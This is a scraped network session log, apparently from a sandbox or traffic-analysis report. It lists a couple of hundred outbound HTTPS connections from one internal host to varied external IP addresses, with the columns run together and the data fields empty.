                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25857192.168.2.1436984104.169.172.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25858192.168.2.144270871.164.145.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25859192.168.2.1441428192.109.224.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25860192.168.2.1436642196.92.241.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25861192.168.2.144602485.67.143.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25862192.168.2.1435632196.105.121.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25863192.168.2.1443150160.65.196.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25864192.168.2.1439736158.186.185.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25865192.168.2.1452974122.112.103.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25866192.168.2.144094670.13.177.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25867192.168.2.1438834147.245.35.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25868192.168.2.143684634.141.121.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25869192.168.2.1437304144.90.143.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25870192.168.2.1444468158.246.149.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25871192.168.2.1434426146.63.177.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25872192.168.2.143474414.15.206.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25873192.168.2.1440690111.148.113.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25874192.168.2.144087868.8.53.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25875192.168.2.1444832150.240.107.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25876192.168.2.144977678.76.141.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25877192.168.2.144253438.5.232.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25878192.168.2.144916412.30.28.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25879192.168.2.1459772205.183.24.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25880192.168.2.143850699.243.154.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25881192.168.2.143855864.217.2.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25882192.168.2.144538668.171.204.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25883192.168.2.1455374205.227.67.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25884192.168.2.145819469.163.199.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25885192.168.2.145698665.183.58.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25886192.168.2.1441954102.147.188.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25887192.168.2.14596544.129.85.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25888192.168.2.1444170165.238.63.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25889192.168.2.144926035.254.164.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25890192.168.2.1449198104.17.219.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25891192.168.2.1457096112.63.126.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25892192.168.2.145640878.112.100.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25893192.168.2.1436592204.115.43.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25894192.168.2.143467094.144.39.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25895192.168.2.144434248.239.128.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25896192.168.2.1432868159.209.158.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25897192.168.2.1448998183.134.253.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25898192.168.2.1440708209.117.244.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25899192.168.2.1433486217.116.86.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25900192.168.2.1451248204.111.12.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25901192.168.2.1455868162.119.234.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25902192.168.2.1449800201.61.228.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25903192.168.2.145057085.242.150.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25904192.168.2.145635281.17.234.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25905192.168.2.1447530124.149.245.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25906192.168.2.145279847.46.13.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25907192.168.2.145691823.70.55.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25908192.168.2.1452620107.77.193.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25909192.168.2.1442664199.136.1.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25910192.168.2.1450606105.208.189.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25911192.168.2.144830220.57.92.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25912192.168.2.1446440119.225.70.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25913192.168.2.144388646.102.47.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25914192.168.2.145421613.233.192.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25915192.168.2.143501094.123.24.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25916192.168.2.145218498.31.109.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25917192.168.2.1445030154.159.119.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25918192.168.2.1442358174.9.107.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25919192.168.2.1449226173.193.176.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25920192.168.2.1434044207.142.62.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25921192.168.2.1433602185.173.111.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25922192.168.2.1434764169.56.143.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25923192.168.2.1449788109.170.67.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25924192.168.2.1434980197.142.75.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25925192.168.2.1440506147.84.108.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25926192.168.2.1448934177.139.57.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25927192.168.2.144247620.65.253.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25928192.168.2.1448584143.38.231.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25929192.168.2.143960258.83.15.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25930192.168.2.1445902161.134.85.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25931192.168.2.1435404100.18.90.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25932192.168.2.1458066105.125.96.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25933192.168.2.1449142132.161.39.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25934192.168.2.1436194206.168.237.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25935192.168.2.143960478.49.254.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25936192.168.2.1450440128.137.123.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25937192.168.2.1443746115.203.203.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25938192.168.2.1440912163.34.218.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25939192.168.2.14382141.217.42.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25940192.168.2.1444830182.159.218.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25941192.168.2.1434538126.232.141.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25942192.168.2.144707687.183.44.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25943192.168.2.1437262212.84.102.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25944192.168.2.144349870.100.38.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25945192.168.2.1450954117.21.67.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25946192.168.2.1457472211.72.69.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25947192.168.2.1446764119.195.87.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25948192.168.2.145699460.95.178.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25949192.168.2.1455974175.131.237.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25950192.168.2.145480069.102.207.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25951192.168.2.144520835.232.199.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25952192.168.2.1454046223.70.88.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25953192.168.2.1437706159.241.174.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25954192.168.2.1455778199.4.43.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25955192.168.2.1432814120.59.251.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25956192.168.2.1451468194.244.9.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25957192.168.2.1434786149.17.162.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25958192.168.2.1460220165.234.89.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25959192.168.2.143744014.176.185.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25960192.168.2.1453606162.41.228.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25961192.168.2.1452980145.157.4.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25962192.168.2.1444432173.130.11.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25963192.168.2.144921499.168.178.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25964192.168.2.1434954126.48.145.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25965192.168.2.146021292.55.5.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25966192.168.2.1454000134.224.244.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25967192.168.2.143703867.111.203.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25968192.168.2.145448096.92.130.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25969192.168.2.1443738210.3.146.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25970192.168.2.145255225.27.42.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25971192.168.2.1434654186.103.77.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25972192.168.2.145583044.115.212.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25973192.168.2.145452271.131.51.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25974192.168.2.1442444109.165.244.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25975192.168.2.1455560208.250.170.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25976192.168.2.1451026121.27.103.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25977192.168.2.144729623.21.166.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25978192.168.2.1448482209.65.194.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25979192.168.2.1436836136.31.130.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25980192.168.2.1448338152.80.86.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25981192.168.2.143375466.245.233.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25982192.168.2.1437928166.39.156.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25983192.168.2.1438218222.118.178.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25984192.168.2.1436302217.140.150.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25985192.168.2.1439418216.217.49.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25986192.168.2.144986631.164.103.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25987192.168.2.1439192157.88.93.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25988192.168.2.1456892109.101.172.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25989192.168.2.143729651.73.109.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25990192.168.2.1445296123.190.70.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25991192.168.2.1433744158.77.8.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25992192.168.2.144509839.249.228.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25993192.168.2.1452444109.137.131.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25994192.168.2.14372869.176.193.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25995192.168.2.145882857.46.41.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25996192.168.2.143789886.102.13.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25997192.168.2.1449556107.215.228.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25998192.168.2.1443416145.32.176.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25999192.168.2.143415217.166.159.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26000192.168.2.144660296.178.10.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26001192.168.2.1435964144.145.3.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26002192.168.2.1440606146.19.113.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26003192.168.2.1442348155.80.31.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26004192.168.2.144125477.20.57.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26005192.168.2.1440218147.214.72.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26006192.168.2.1439144146.25.118.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26007192.168.2.1443156119.209.242.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26008192.168.2.143885251.212.194.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26009192.168.2.143742471.112.127.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26010192.168.2.1454584182.247.122.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26011192.168.2.1447852177.7.180.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26012192.168.2.1447010107.141.41.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26013192.168.2.1452278217.108.9.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26014192.168.2.1440304208.98.139.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26015192.168.2.144615498.57.232.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26016192.168.2.144660257.168.32.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26017192.168.2.1447102198.52.67.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26018192.168.2.1450786133.204.195.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26019192.168.2.145757836.241.222.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26020192.168.2.1433472207.17.133.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26021192.168.2.1439694211.238.98.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26022192.168.2.1439306203.50.17.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26023192.168.2.144470675.240.1.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26024192.168.2.1439550192.141.2.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26025192.168.2.144490464.226.180.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26026192.168.2.1452598104.25.203.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26027192.168.2.1446888156.166.217.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26028192.168.2.1449224155.37.59.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26029192.168.2.144098631.147.190.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26030192.168.2.1435856192.157.29.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26031192.168.2.1433546176.139.4.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26032192.168.2.1457988200.170.41.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26033192.168.2.145458436.129.187.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26034192.168.2.1457378164.190.11.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26035192.168.2.145744497.117.175.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26036192.168.2.145724679.251.38.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26037192.168.2.1434300131.191.89.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26038192.168.2.1439174124.222.45.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26039192.168.2.1453114176.162.214.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26040192.168.2.1434898141.115.237.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26041192.168.2.1450306124.179.66.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26042192.168.2.1447138157.117.90.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26043192.168.2.143777647.163.8.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26044192.168.2.145154042.212.77.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26045192.168.2.143623097.151.249.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26046192.168.2.145340218.195.6.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26047192.168.2.145331284.248.51.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26048192.168.2.144793840.38.119.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26049192.168.2.1454548184.159.92.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26050192.168.2.1448102134.243.116.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26051192.168.2.1445660113.111.242.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26052192.168.2.145646212.26.52.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26053192.168.2.144568637.20.248.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26054192.168.2.1450496149.195.215.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26055192.168.2.1444352204.171.82.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26056192.168.2.1451656114.134.174.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26057192.168.2.1450238194.156.236.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26058192.168.2.1451810154.228.148.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26059192.168.2.143377049.129.128.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26060192.168.2.1452192220.146.77.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26061192.168.2.145845845.172.3.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26062192.168.2.1449466174.52.97.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26063192.168.2.1440298205.13.40.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26064192.168.2.1448128220.42.124.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26065192.168.2.1434930169.131.26.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26066192.168.2.1435362158.63.195.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26067192.168.2.146054031.120.193.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26068192.168.2.145845035.62.192.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26069192.168.2.1454000104.199.194.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26070192.168.2.1444084106.151.54.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26071192.168.2.144223698.215.235.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26072192.168.2.145926034.200.25.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26073192.168.2.145572674.129.220.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26074192.168.2.1434720219.7.174.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26075192.168.2.1438514218.135.9.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26076192.168.2.144327438.205.169.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26077192.168.2.143640488.14.193.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26078192.168.2.1438782112.96.171.68443
